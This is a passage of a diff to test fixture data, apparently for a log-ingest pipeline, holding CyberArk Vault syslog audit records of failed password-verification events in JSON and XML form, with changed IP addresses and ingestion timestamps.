\u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=2;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615826099\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 09:35:01\",\"IsoTimestamp\":\"2021-03-15T16:35:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=2;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"2\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615826099\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", + "ingested": "2021-12-09T13:37:01.193619800Z", + "original": "\u003c7\u003e1 2021-03-15T16:35:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 09:35:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T16:35:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=2;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615826099\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 09:35:01\",\"IsoTimestamp\":\"2021-03-15T16:35:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=2;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"2\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615826099\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", "action": "cpm verify password failed", @@ -699,7 +644,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-06-09T10:24:34.493911500Z", + "ingested": "2021-12-09T13:37:01.193625500Z", "original": "\u003c7\u003e1 2021-03-15T16:56:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 09:56:29\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T16:56:29Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615827245\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 09:56:29\",\"IsoTimestamp\":\"2021-03-15T16:56:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615827245\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -809,7 +754,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application", - "ingested": "2021-06-09T10:24:34.493919100Z", + "ingested": "2021-12-09T13:37:01.193631200Z", "original": "\u003c7\u003e1 2021-03-15T17:01:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:01:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:01:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615827554\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"mariadb\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:01:07\",\"IsoTimestamp\":\"2021-03-15T17:01:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615827554\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"DSN\",\"Value\":\"mariadb\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -919,7 +864,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length", - "ingested": "2021-06-09T10:24:34.493922700Z", + "ingested": "2021-12-09T13:37:01.193636900Z", "original": "\u003c7\u003e1 2021-03-15T17:05:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:05:47\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:05:47Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615827864\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"DRIVER={MariaDB ODBC 3.1 Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:05:47\",\"IsoTimestamp\":\"2021-03-15T17:05:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615827864\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"DSN\",\"Value\":\"DRIVER={MariaDB ODBC 3.1 